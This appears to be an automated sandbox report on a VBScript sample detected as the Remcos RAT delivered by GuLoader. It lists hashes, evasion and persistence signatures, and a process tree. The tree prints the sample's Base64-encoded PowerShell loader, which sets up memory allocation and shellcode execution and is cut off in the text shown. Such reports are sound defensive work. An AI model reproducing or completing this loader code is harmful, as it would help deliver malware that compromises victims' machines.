Edit tour
Windows
Analysis Report
tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
Overview
General Information
| Sample Name: | tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs |
| Analysis ID: | 560422 |
| MD5: | b8fbb413a49b2f05872cb38372454664 |
| SHA1: | 2071d3476c94b3cfc924b31c705806e78df674a8 |
| SHA256: | cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32 |
| Infos: |   |
 | |
Detection
Remcos GuLoader
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Yara detected Remcos RAT
Detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Creates an autostart registry key pointing to binary in C:\Windows
Writes to foreign memory regions
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Sigma detected: Autorun Keys Modification
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
- System is w10x64native
wscript.exe (PID: 1396 cmdline: C:\Windows \System32\ wscript.ex e "C:\User s\user\Des ktop\tregr ene-KaufVe rtraeg-Joa chimSvenss on-2356433 4.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1) 
powershell.exe (PID: 1568 cmdline: C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe" - NoExit -En codedComma nd "IwBlAH IAaAB2AGUA cgB2AHMAaw B1ACAATABl AGoAZQBzAH YAZQBuAGQA ZQA5ACAAQQ ByAGMAaABh AGkAOAAgAF MAYQBnAHMA IABkAHIAbw BzAGgAawBp AGUAcwBoAC AAbABhAG4A ZABzAGsAYQ AgAHcAaQB0 AGMAaABiAG UAbAAgAEgA eQBkAHIAYQ BuAHQAIABT AGMAdQBsAG wAcwBiAGEA IABhAGkAcg BiAHUAcgBz AHQAdQAgAH IAZQB0AHIA aQBiAHUAdA BvACAAZABh AGcAcABhAG EAZgB1ACAA VQBQAFQASA BSACAAbQBv AHIAcABpAG 8AbgBmACAA DQAKAEEAZA BkAC0AVAB5 AHAAZQAgAC 0AVAB5AHAA ZQBEAGUAZg BpAG4AaQB0 AGkAbwBuAC AAQAAiAA0A CgB1AHMAaQ BuAGcAIABT AHkAcwB0AG UAbQA7AA0A CgB1AHMAaQ BuAGcAIABT AHkAcwB0AG UAbQAuAFIA dQBuAHQAaQ BtAGUALgBJ AG4AdABlAH IAbwBwAFMA ZQByAHYAaQ BjAGUAcwA7 AA0ACgBwAH UAYgBsAGkA YwAgAHMAdA BhAHQAaQBj ACAAYwBsAG EAcwBzACAA UwBZAEQAWQ BFAE0ARQBO AEkAVAAxAA 0ACgB7AA0A CgBbAEQAbA BsAEkAbQBw AG8AcgB0AC gAIgBuAHQA ZABsAGwALg BkAGwAbAAi ACkAXQBwAH UAYgBsAGkA YwAgAHMAdA BhAHQAaQBj ACAAZQB4AH QAZQByAG4A IABpAG4AdA AgAE4AdABB AGwAbABvAG MAYQB0AGUA VgBpAHIAdA B1AGEAbABN AGUAbQBvAH IAeQAoAGkA bgB0ACAAUw BZAEQAWQBF AE0ARQBOAE kAVAA2ACwA cgBlAGYAIA BJAG4AdAAz ADIAIABOAG EAdAB1AHIA OQAsAGkAbg B0ACAAcwBl AHIAdQAsAH IAZQBmACAA SQBuAHQAMw AyACAAUwBZ AEQAWQBFAE 0ARQBOAEkA VAAsAGkAbg B0ACAAYQBk AGoAdQAsAG kAbgB0ACAA UwBZAEQAWQ BFAE0ARQBO AEkAVAA3AC kAOwANAAoA WwBEAGwAbA BJAG0AcABv AHIAdAAoAC IAdQBzAGUA cgAzADIALg BkAGwAbAAi ACkAXQBwAH UAYgBsAGkA YwAgAHMAdA BhAHQAaQBj ACAAZQB4AH QAZQByAG4A IABJAG4AdA BQAHQAcgAg AEMAYQBsAG wAVwBpAG4A ZABvAHcAUA ByAG8AYwBX ACgAdQBpAG 4AdAAgAHMA ZQByAHUANQ AsAGkAbgB0 ACAAcwBlAH IAdQA2ACwA aQBuAHQAIA BzAGUAcgB1 ADcALABpAG 4AdAAgAHMA ZQByAHUAOA AsAGkAbgB0 ACAAcwBlAH IAdQA5ACkA OwANAAoAWw BEAGwAbABJ AG0AcABvAH IAdAAoACIA awBlAHIAbg BlAGwAMwAy AC4AZABsAG wAIgApAF0A cAB1AGIAbA BpAGMAIABz AHQAYQB0AG kAYwAgAGUA eAB0AGUAcg BuACAAdgBv AGkAZAAgAF IAdABsAE0A bwB2AGUATQ BlAG0AbwBy AHkAKABJAG 4AdABQAHQA cgAgAHMAZQ ByAHUAMQAs AHIAZQBmAC AASQBuAHQA MwAyACAAcw BlAHIAdQAy ACwAaQBuAH QAIABzAGUA cgB1ADMAKQ A7AA0ACgB9 AA0ACgAiAE AADQAKACMA ZgBlAHIAbg AgAEMAQQBN AFAASABJAF IARQAgAEYA SgBFAEQAUg BFAE4AIABD AEEAUABTAE kAQwBJAE4A IABTAGMAYQ ByAGYAZQBk AGUAbgB0AC AASQBuAHQA ZQA5ACAAQQ BaAFkATQAg AEYASQBHAF UAUgAgAEEA ZgBnAGkAZg B0AHMAbgAz ACAAdQBuAH QAaABvAHIA bgBsACAAUw BhAHUAcwBz ADMAIABOAE 8ATABFACAA SABlAGUAZA BsAGUAcwBz AGIAIABNAE kATgBFAFIA QQAgAFYAaQ BuAGQAZABy AGUAdgBlAH QAIABPAFAA SABJAEQASQ BPACAATQBB AEcATgBFAF QASQBTAEUA IABnAGEAbA B2ACAAbQBp AGwAdABlAG 4AZQBzACAA WABFAE4ATw AgAEEAbABs AGUANQAgAG 4AbwBuAG0A bwBuAGkAcw B0ACAAIAAN AAoAJABTAF kARABZAEUA TQBFAE4ASQ BUADMAPQAw ADsADQAKAC QAUwBZAEQA WQBFAE0ARQ BOAEkAVAA5 AD0AMQAwAD QAOAA1ADcA NgA7AA0ACg AkAFMAWQBE AFkARQBNAE UATgBJAFQA OAA9AFsAUw BZAEQAWQBF AE0ARQBOAE kAVAAxAF0A